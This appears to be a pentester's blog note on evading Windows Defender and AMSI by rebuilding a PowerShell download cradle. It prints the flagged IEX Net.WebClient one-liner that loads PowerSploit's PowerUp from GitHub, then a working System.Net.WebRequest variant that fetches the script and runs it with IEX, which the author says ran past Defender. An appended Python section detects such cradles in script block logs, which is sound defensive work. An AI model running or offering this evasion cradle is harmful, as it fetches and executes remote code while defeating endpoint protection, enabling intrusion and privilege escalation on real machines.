Hi Folks,

I am writing this article to keep my notes while learning new ways of using PowerShell for Pentesting and Red teaming.

This post is about bypassing Microsoft Windows Defender and AMSI to download and execute a cradle for malicious PowerShell scripts ;). I will try to make this post as precise as I can.

While working on my educational research project, I have been trying to find new ways to bypass AMSI in order to execute PowerShell scripts and commands that are considered malicious and are flagged by Microsoft Windows Defender.

Just to note, protection definitions were up to date (screenshot omitted).

I was trying to run the PrivEsc enumeration script "PowerUp".

But as expected, AMSI was already awake :P and it blocked me from running the cradle:

IEX(New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1')

Defender blocked the well-known IEX cradle (screenshot omitted).

So, I thought I would try some other .NET class than Net.WebClient. I am not good at programming, so I googled and found the System.Net.WebRequest class.

After playing around for a while I came up with the script below:

$webreq = [System.Net.WebRequest]::Create('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
$resp = $webreq.GetResponse()
$respstream = $resp.GetResponseStream()
$reader = [System.IO.StreamReader]::new($respstream)
$content = $reader.ReadToEnd()

After that is set up, it is as simple as IEX :P

IEX($content)

Final execution of the PowerUp script using System.Net.WebRequest (screenshot omitted).
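From the defender's side, the lesson of the above is that a signature on the Net.WebClient one-liner is weak: the same cradle can be built on a different .NET class and split across several script blocks so that no single block looks like the known pattern. The following Python is added here as an example and is not part of the original post; it correlates PowerShell script block log entries (constructed here in the shape of 4104-style records, process id plus script text) per process and flags a process only when a remote fetch is followed by Invoke-Expression/IEX, which catches both the one-liner and the multi-step WebRequest version.

```python
import re
from collections import defaultdict

# Constructed sample of script block log entries: (process id, script text).
# These are made-up records for the example, not real log output.
SAMPLE_EVENTS = [
    (4120, "IEX(New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"),
    (5311, "$webreq = [System.Net.WebRequest]::Create('https://example.invalid/b.ps1')"),
    (5311, "$resp=$webreq.GetResponse(); $respstream=$resp.GetResponseStream()"),
    (5311, "$reader=[System.IO.StreamReader]::new($respstream); $content=$reader.ReadToEnd()"),
    (5311, "IEX($content)"),
    (6001, "Get-ChildItem C:\\Users | Select-Object Name"),
    (6002, "$r=[System.Net.WebRequest]::Create('https://example.invalid/d.json'); $r.GetResponse().StatusCode"),
]

# Indicators that a block fetches remote content into the runspace.
FETCH = re.compile(r"(Net\.WebClient|DownloadString|System\.Net\.WebRequest|GetResponseStream|ReadToEnd)", re.I)
# Indicators that a block hands a string to the expression evaluator (IEX is the alias of Invoke-Expression).
EXEC = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)


def classify_block(text):
    """Return which indicator groups a single script block matches."""
    return {"fetch": bool(FETCH.search(text)), "exec": bool(EXEC.search(text))}


def find_cradles(events):
    """Group script blocks by process id and return the ids of processes in which
    a remote fetch was seen before (or in the same block as) an IEX/Invoke-Expression.
    A fetch alone (e.g. a legitimate API call) is not flagged."""
    fetched = defaultdict(bool)
    flagged = set()
    for pid, text in events:
        c = classify_block(text)
        if c["fetch"]:
            fetched[pid] = True          # remember the fetch for later blocks of this process
        if c["exec"] and fetched[pid]:
            flagged.add(pid)             # content was downloaded and then evaluated
    return sorted(flagged)


if __name__ == "__main__":
    print("suspicious processes:", find_cradles(SAMPLE_EVENTS))
```

Because the correlation is per process rather than per block, the detection does not depend on the particular .NET class named in any single block; adding further fetch indicators to FETCH extends it without touching the logic.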

Thanks :) Maybe I will come up with a shorter version of this.